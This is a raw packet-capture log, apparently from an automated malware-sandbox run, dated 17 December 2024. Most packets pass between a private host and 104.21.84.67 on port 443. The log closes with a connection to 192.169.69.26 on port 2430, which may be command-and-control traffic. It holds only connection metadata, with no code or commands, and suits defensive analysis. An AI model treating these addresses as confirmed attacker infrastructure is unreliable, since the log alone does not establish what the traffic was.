                                                                                                          Dec 17, 2024 07:22:34.406666040 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.406706095 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.406723976 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.414860964 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.414900064 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.414953947 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.414967060 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.415030956 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.423172951 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.467588902 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.467600107 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.514467955 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.526346922 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.576968908 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.576989889 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.602142096 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.602165937 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.602204084 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.602217913 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.602260113 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.610022068 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.618005037 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.618025064 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.618076086 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.618088961 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.618139982 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.625904083 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.633300066 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.633375883 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.633398056 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.641114950 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.641179085 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.641189098 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.648925066 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.649020910 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.649032116 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.664773941 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.664844990 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.664906025 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.664922953 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.664983034 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.672605038 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.680406094 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.680443048 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.680478096 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.680505991 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.680566072 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.687971115 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.733228922 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.733253002 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.780103922 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.790201902 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.794192076 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.794254065 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.794269085 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.801810026 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.801876068 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.801888943 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.823770046 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.823777914 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.823843956 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.823868036 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.828573942 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.828644037 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.828656912 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.828739882 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.832501888 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.836914062 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.836992025 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.837004900 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.837061882 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.845616102 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.845623016 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.845691919 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.854358912 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.854365110 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.854445934 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.858789921 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.858795881 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.858884096 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.867626905 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.867633104 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.867696047 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.875988007 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.876070976 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.884666920 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.884757042 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.889225960 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.889307022 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.981982946 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.982111931 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.984011889 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.984112024 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.993668079 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.993797064 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:34.997504950 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:34.997603893 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.004880905 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.004992962 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.008445024 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.008534908 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.015228987 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.015350103 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.021616936 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.021707058 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.027920008 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.027998924 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.031172991 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.031260967 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.037475109 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.037553072 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.039386988 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.039465904 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.039482117 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.043203115 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.043271065 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.043284893 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.045767069 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.046909094 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.046989918 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.050771952 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.050878048 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.052741051 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.052835941 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.056552887 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.056638956 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.060309887 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.060391903 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.064126015 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.064207077 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.065221071 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.065299988 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.068972111 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.069041967 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.072670937 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.072751045 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.177692890 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.177771091 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.177798033 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.177860022 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.180708885 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.180769920 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.183624983 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.183691978 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.187194109 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.187289000 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.189071894 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.189138889 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.200361013 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.200367928 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.200412989 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.200444937 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.200464010 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.200515985 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.200537920 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.211441040 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.211453915 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.211530924 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.211544037 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.211608887 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.221128941 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.221143007 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.221225023 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.221239090 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.221302032 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.231329918 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.231345892 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.231430054 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.231451035 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.231512070 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.237692118 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.237776041 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.237788916 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.248769999 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.248821020 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.248878002 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.248894930 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.248924971 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.295727968 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.367414951 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.367479086 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.367538929 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.367573023 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.367607117 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.367647886 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.376298904 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.376346111 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.376396894 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.376410961 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.376456022 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.376478910 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.383800983 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.383843899 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.383882046 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.383897066 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.383944035 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.383963108 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.392410040 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.392455101 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.392499924 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.392513037 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.392560959 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.392582893 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.396049976 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.396156073 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.396171093 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.405194998 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.405247927 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.405282974 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.405297041 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.405343056 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.412610054 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.412656069 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.412708044 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.412720919 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.412775040 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.421040058 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.421080112 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.421144962 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.421159029 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.421205997 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.429635048 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.429676056 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.429714918 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.429727077 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.429796934 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.483218908 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.562805891 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.562833071 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.562876940 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.562913895 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.562936068 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.562972069 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.563007116 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.570796967 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.570856094 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.570880890 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.570900917 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.570940971 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.570964098 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.577598095 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.577637911 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.577696085 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.577708006 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.577755928 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.577791929 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.585618973 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.585659981 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.585721970 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.585733891 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.585779905 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.585800886 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.592983961 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.593029022 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.593081951 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.593094110 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.593137980 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.593163967 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.600970984 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.601013899 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.601092100 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.601103067 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.601190090 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.608833075 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.608892918 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.608916998 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.608935118 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.608954906 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.608979940 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.609081030 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.615828037 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.615869999 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.615931988 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.615947962 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.616046906 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.754942894 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.755003929 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.755045891 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.755068064 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.755095005 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.755184889 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.762689114 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.762732983 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.762767076 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.762778997 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.762809038 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.762839079 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.769665956 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.769707918 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.769814014 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.769824982 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.769927025 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.777606010 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.777650118 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.777720928 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.777733088 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.777786016 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.777846098 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.785115957 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.785155058 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.785238981 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.785250902 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.785356998 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.787288904 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.787400961 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.787425995 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.787580967 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.788101912 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.788119078 CET44349770104.21.84.67192.168.2.6
                                                                                                          Dec 17, 2024 07:22:35.788146973 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:35.788177013 CET49770443192.168.2.6104.21.84.67
                                                                                                          Dec 17, 2024 07:22:36.170319080 CET497812430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:36.290205956 CET243049781192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:36.290313005 CET497812430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:36.295800924 CET497812430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:36.415575027 CET243049781192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:46.846335888 CET243049781192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:22:46.846421003 CET497812430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:22:46.846509933 CET497812430192.168.2.6192.169.69.26
